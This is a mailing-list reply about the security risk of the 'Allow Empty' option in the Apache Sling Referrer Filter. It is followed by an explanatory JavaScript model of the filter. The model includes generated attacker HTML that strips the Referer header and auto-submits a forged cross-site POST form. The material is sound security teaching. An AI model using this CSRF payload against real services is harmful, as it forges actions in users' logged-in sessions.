Hello Daniel
On 28.05.2015 10:11, Daniel Sungjin Jung wrote:
> Checking the “Allow Empty” checkbox in the Apache Sling Referrer Filter is not
> recommended in a production service.
> I’d like to know what specific security risks we face if we turn it on for
> a production service.
Apart from the obvious cases (bugs in browsers/plugins, MitM), which allow
for HTTP header manipulation but often allow complete circumvention of
CSRF protections anyway, there have been several cases where it was
possible to strip the referrer header client-side using some tricks with
JavaScript and iframes (e.g. [0], [1]).
Best greetings
Lars
[0] http://homakov.blogspot.com/2012/04/playing-with-referer-origin-disquscom.html
[1] http://webstersprodigy.net/2013/02/01/stripping-the-referer-in-a-cross-domain-post-request/
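To make the risk Lars describes concrete, here is an added example (not code from the Sling project or from anyone in this thread). It models a Referer-based CSRF check with an "allow empty" switch, loosely in the spirit of the Sling Referrer Filter's options (the trusted-host list, filtered methods and host names are assumptions for the example, not Sling's defaults), and shows that with the switch on, a cross-site form whose Referer the browser never sends passes the check. The attacker page uses the standard referrer policy meta tag, the modern, specified way to achieve what the posts in [0] and [1] did with iframe and JavaScript tricks.

```javascript
// Added example, not code from Apache Sling or from the thread's author.
// Models a Referer-based CSRF filter with an "allow empty" switch and shows
// why allowing an empty Referer makes the check trivial to bypass from a
// cross-site page.

// Assumed configuration for the example (not Sling's defaults).
const TRUSTED_HOSTS = new Set(["sling.example"]);
const FILTERED_METHODS = new Set(["POST", "PUT", "DELETE"]);

// Decide whether a request passes the referrer check.
// req is shaped like { method, headers: { host, referer } };
// returns { allowed, reason }.
function referrerCheck(req, { allowEmpty }) {
  if (!FILTERED_METHODS.has(req.method.toUpperCase())) {
    return { allowed: true, reason: "method not filtered" };
  }
  const referer = req.headers.referer;
  if (referer === undefined || referer === "") {
    // This is the whole "Allow Empty" decision: with it on, a request that
    // simply omits the header is waved through.
    return allowEmpty
      ? { allowed: true, reason: "empty referer allowed" }
      : { allowed: false, reason: "empty referer rejected" };
  }
  let refHost;
  try {
    refHost = new URL(referer).hostname;
  } catch {
    return { allowed: false, reason: "unparseable referer" };
  }
  // Trust the request's own host (port stripped; IPv6 literals not handled
  // in this toy) plus the configured list.
  const selfHost = req.headers.host.split(":")[0];
  if (refHost === selfHost || TRUSTED_HOSTS.has(refHost)) {
    return { allowed: true, reason: "referer host trusted" };
  }
  return { allowed: false, reason: "foreign referer" };
}

// Constructed requests (not captured traffic). The third is what the attacker
// page below produces: a cross-site POST with no Referer header at all.
const legit = {
  method: "POST",
  headers: { host: "sling.example", referer: "https://sling.example/content/page.html" },
};
const crossSite = {
  method: "POST",
  headers: { host: "sling.example", referer: "https://attacker.example/csrf.html" },
};
const stripped = { method: "POST", headers: { host: "sling.example" } };

// The attacker's page: the referrer policy meta tag (assumed hypothetical
// target URL and field name) tells the browser to omit Referer on the
// auto-submitted form, so the server sees the "stripped" request above.
function attackerPage(target) {
  return [
    "<!doctype html>",
    '<meta name="referrer" content="no-referrer">',
    `<form id="f" method="POST" action="${target}">`,
    '  <input type="hidden" name="title" value="changed by CSRF">',
    "</form>",
    "<script>document.getElementById('f').submit();</script>",
  ].join("\n");
}

// Run the three requests through the filter for a given allowEmpty setting.
function outcomes(allowEmpty) {
  return {
    legit: referrerCheck(legit, { allowEmpty }).allowed,
    crossSite: referrerCheck(crossSite, { allowEmpty }).allowed,
    stripped: referrerCheck(stripped, { allowEmpty }).allowed,
  };
}

console.log("allowEmpty=false", outcomes(false));
console.log("allowEmpty=true ", outcomes(true));
console.log(attackerPage("https://sling.example/content/victim"));
```

With allowEmpty=false the forged request is rejected alongside the one that still carries the attacker's Referer; with allowEmpty=true only the request that honestly names attacker.example is blocked, which is why the option is no protection against an attacker who controls the page sending the request.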